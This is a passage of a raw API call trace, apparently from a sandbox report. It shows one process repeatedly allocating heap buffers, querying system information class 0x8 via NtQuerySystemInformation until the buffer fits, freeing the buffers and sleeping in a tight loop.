Size=0x60) returned 0x285a9b8 [0281.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0281.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0281.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0281.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0281.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0281.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.890] Sleep (dwMilliseconds=0x110) [0281.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0281.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0281.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0281.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0281.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0281.906] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0281.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0281.906] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0281.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.907] Sleep (dwMilliseconds=0x110) [0281.934] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0281.934] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.934] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0281.935] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0281.935] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.935] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0281.935] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0281.935] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0281.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0281.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0281.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.936] Sleep (dwMilliseconds=0x110) [0281.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0281.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0281.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0281.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0281.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0281.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0281.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0281.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0281.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.957] Sleep (dwMilliseconds=0x110) [0281.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0281.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0281.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0281.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0281.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0281.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0281.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0281.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0281.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.973] Sleep (dwMilliseconds=0x110) [0281.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0281.985] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0281.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0281.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0281.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0281.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0281.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0281.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0281.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.991] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.991] Sleep (dwMilliseconds=0x110) [0282.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0282.001] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0282.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0282.001] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0282.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0282.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0282.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0282.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0282.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.003] Sleep (dwMilliseconds=0x110) [0282.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0282.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0282.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0282.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0282.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0282.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0282.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0282.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0282.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.019] Sleep (dwMilliseconds=0x110) [0282.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0282.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0282.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0282.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0282.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0282.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0282.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0282.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0282.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.034] Sleep (dwMilliseconds=0x110) [0282.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0282.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0282.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0282.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0282.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0282.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0282.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0282.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0282.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.051] Sleep (dwMilliseconds=0x110) [0282.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0282.061] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0282.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0282.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0282.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0282.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0282.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0282.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0282.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.065] Sleep (dwMilliseconds=0x110) [0282.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0282.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0282.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0282.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0282.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0282.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0282.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0282.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0282.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.082] Sleep (dwMilliseconds=0x110) [0282.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0282.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0282.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0282.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0282.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0282.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0282.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0282.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0282.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.096] Sleep (dwMilliseconds=0x110) [0282.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0282.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0282.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0282.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0282.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0282.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0282.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0282.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0282.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.113] Sleep (dwMilliseconds=0x110) [0282.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0282.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.124] HeapFree (in: hHeap=0x2560000, 